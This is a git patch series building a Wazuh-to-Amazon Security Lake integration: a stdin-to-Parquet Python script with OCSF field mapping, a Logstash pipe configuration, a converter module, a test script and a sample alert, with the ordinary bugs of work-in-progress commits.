From 159adcb5e33ab0d3b99fd274f00a0e38028b075d Mon Sep 17 00:00:00 2001
From: Fede Tux
Date: Mon, 5 Feb 2024 15:47:23 -0300
Subject: [PATCH 01/34] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake

---
 integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100755 integrations/stdin_to_securitylake.py

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
new file mode 100755
index 0000000000000..fd70e41906ccb
--- /dev/null
+++ b/integrations/stdin_to_securitylake.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python3
+
+import os
+import sys
+import argparse
+import logging
+import time
+from datetime import datetime
+from pyarrow import json
+import pyarrow.parquet as pq
+
+def encode_parquet(json_list):
+    for json in json_list:
+        ### read_json is meant for files, need to change it to read from a string
+        ### https://arrow.apache.org/docs/python/json.html
+        table = json.read_json(json)
+        pq.write_table(table, 'parquet/output.parquet')
+
+def push_to_s3(parquet):
+    ## Fill with AWS S3 code
+    pass
+
+def read_chunk(fileobject,length):
+    output=[]
+    for i in range(0,length):
+        line = fileobject.readline()
+        if line is '':
+            output.append(line)
+            break
+        output.append(line)
+    return output
+
+def get_elapsedtime(reference_timestamp):
+    current_time = datetime.now(tz='UTC')
+    return (current_time - reference_timestamp).total_seconds()
+
+if __name__ == "__main__":
+
+    clock = datetime.now(tz='UTC')
+    clockstr = clock.strftime('%F_%H:%M:%S')
+
+    parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
+
+    parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer')
+    parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer')
+    parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer')
+    parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer')
+
+    debugging = parser.add_argument_group('debugging')
+    debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
+    debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')
+
+    args = parser.parse_args()
+
+    logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG)
+    logging.debug("Running main()")
+    logging.debug("Current time is " + str(clockstr) )
+
+    try:
+        logging.info('BUFFERING STDIN')
+
+        with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin:
+
+            output_buffer = []
+
+            starttimestamp = datetime.now(tz='UTC')
+
+            try:
+                while True:
+                    output_buffer.append(read_chunk(stdin,args.linebuffer))
+                    if output_buffer[len(output_buffer)-1] is '':
+                        time.sleep(args.sleeptime)
+                    if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval:
+                        encode_parquet(output_buffer)
+                        logging.debug(output_buffer)
+                        starttimestamp = datetime.now(tz='UTC')
+                        output_buffer = []
+            except KeyboardInterrupt:
+                logging.info("Keyboard Interrupt issued")
+                exit(0)
+
+
+        logging.info('FINISHED RETRIEVING STDIN')
+    except Exception as e:
+        logging.error("Error running script")
+        exit(1)

From 6e17aae0dc430737a6f73d239dd991b6b219d418 Mon Sep 17 00:00:00 2001
From: Fede Tux
Date: Mon, 5 Feb 2024 15:50:39 -0300
Subject: [PATCH 02/34] Adding logstash pipeline for
python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} From a05c23c080f6592fc5a4a53617983d558cebb752 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 03/34] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code @@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for 
submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From e04f0d53846556fbeb3a6eced7e71fc77b509344 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 04/34] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 93935fc24dd0fe5d2a1519d0b5ec01e51cb05994 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 05/34] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from 
pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output @@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1db384c0da0b0b2f60173861aa87a1c27e05494b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 06/34] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): @@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From c60045fbcf5a7ebd55be6054969f0f4c0fc3c46f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 07/34] Add s3 handling reference links --- 
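For reference, the direct-to-S3 write that the pyarrow comments in these patches point at can be sketched with pyarrow's S3 filesystem. This is only an illustration, not part of the patch series: the bucket, prefix and region below are placeholders, and credentials are assumed to be picked up from the standard AWS locations (~/.aws/credentials or environment variables).

    import pyarrow as pa
    from pyarrow import fs, parquet

    s3 = fs.S3FileSystem(region='us-east-1')                        # placeholder region
    table = pa.Table.from_pylist([{'message': 'example alert'}])    # list of dicts -> Arrow table
    with s3.open_output_stream('example-bucket/example-prefix/alerts.parquet') as stream:
        parquet.write_table(table, stream)                          # Parquet written straight to the bucket
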
integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,16 +7,19 @@ import time import json from datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 8949097be444871ed6db264c1133c1d005f6fdf3 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 08/34] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] @@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, 
help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') @@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From eb7ace3c3c4a02388596c36584766deb06a902da Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 09/34] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json @@ -0,0 +1,42 @@ +{ + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "state_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.type" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } +} diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 2b8a1de14755b..d125a2ff6d56b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def 
encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) @@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From 3d7b8ff585d5680fce00a5cdf60bbce2b3c5307f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 10/34] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 545f855a679015d214c04588fb7758311701cc0c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 11/34] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### 
https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From f753b1235f54b6b94dc94f242808256829e40e94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 12/34] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. 
+ """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json @@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", 
